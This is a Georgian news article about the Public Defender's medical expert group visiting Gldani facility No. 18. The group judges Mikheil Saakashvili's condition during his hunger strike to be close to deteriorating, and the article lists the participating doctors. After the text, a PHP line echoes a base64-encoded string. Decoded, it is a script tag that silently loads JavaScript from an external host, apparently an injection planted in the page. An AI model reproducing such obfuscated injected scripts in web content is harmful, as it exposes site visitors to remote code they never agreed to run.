celsiusi
ავერსი საქკაბელი
სახალხო დამცველის აპარატის მიერ შექმნილი ექიმების ჯგუფმა გლდანის მე-18 სამკურანალო დაწესებულება დატოვეს.
 
როგორც მიხეილ სააკაშვილთან შეხვედრის შემდეგ ნინო ლომჯარიამ და ექიმებმა განაცხადეს, დასკვნა წერილობითი სახით სავარაუდოდ ხვალ გახდება ცნობილი, წინასწარი შეფასების სახით კი აცხადებენ, რომ მიხეილ სააკაშვილის მდგომარეობა ახლოსაა დამძიმებასთან.
 
როგორც ექსპერტთა ჯგუფში შემავალი ერთ-ერთი ექიმი, გიორგი გრიგოლია ამბობს, პოზიციები შეჯერდება, თუმცა მისი აზრით ამ დაწესებულებაში მიხეილ სააკაშვილის სიმძიმის პაციენტის მკურნალობა მიზანშეწონილი არ არის:
 
„ჩვენ ვინაიდან ბევრი ვიყავით, ყველა თავის საქმეს აკეთებდა. ზოგი მიხეილ სააკაშვილის კვლევით იყო ოდაკავებული, ზოგი ინფრასტრუქტურით. სააკაშვილი ნამდვილად შიმშილობს, ამას ადასტურებს ყველა ვინც იქ არის. მდგომარეობა საკმაოდ მძიმეა ვერ ვიტყვი, მაგრამ ახლოსაა მალე დამზიმებასთან. ამას აჩვენებს მისი ანალიზები.
 
ეს ინფრასტრუქტურა შექმნილია ორი კვირის წინ. ინტენსიური თერაპიის პალატა კარგადაა აღჭურვილი, სტაფი გადმოყვანილია რესპუბლიკურიდან. უარყოფითია ის, რომ ინტენსიური თერაპიის გამოცდილებ ამ დაწესებულებას არ აქვს. სააკაშვილი ჯერ არ საჭიროებს რეანიმაციულ ღონისძიებებს, მას სჭირდება ინტენსიური თერაპია. ჩემი პირადი აზრია რომ ამ დაწესებულებაში ასეთი პაციენტის მკურანლობა არ არის მიზანშეწონილი“ – ამბობს გიორგი გრიგოლია.
 
სახალხო დამცველი სამედიცინო სფეროს ექსპერტებთან ერთად გლდანის მე-18 დაწესებულებაში თითქმის 4 საათის განმავლობაში იმყოფებოდა.
 
მულტიპროფილურ ექსპერტთა ჯგუფში სახალხო დამცველმა მოიწვია სამედიცინო დარგის შემდეგი სპეციალისტები:
 
გიორგი გრიგოლია, ანესთეზიოლოგ-რეანიმატოლოგი;
გრიგოლი ხურციძე, შინაგანი სნეულებები/ჰოსპიტალური მედიცინა;
გიორგი კაჭარავა, კარდიოლოგი;
გიორგი პაპიაშვილი, კარდიოლოგი/არითმიოლოგი;
აიდა გოზალოვა – ჰემატოლოგი, კლინიკური ონკოლოგი, ინტერნისტი, პალიატიური მედიცინის სპეციალისტი;
მამუკა მაჩაიძე, ინფექციონისტი, თერაპევტი;
თენგო წულაძე, ნევროლოგი;
ნინო ზავრაშვილი, ენდოკრინოლოგი.
 
ჯგუფის საქმიანობაში ასევე ჩაერთვება სახალხო დამცველის აპარატში შრომითი ხელშეკრულების საფუძველზე დასაქმებული ექიმი, მედიცინის დოქტორი მერაბ ქავთარაძე. საჭიროების შემთხვევაში კი, ომბუდსმენის ცნობით, ჯგუფის შემადგენლობა გაფართოვდება შესაბამისი დარგის სამედიცინო ექსპერტთა მონაწილეობით.
1089
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");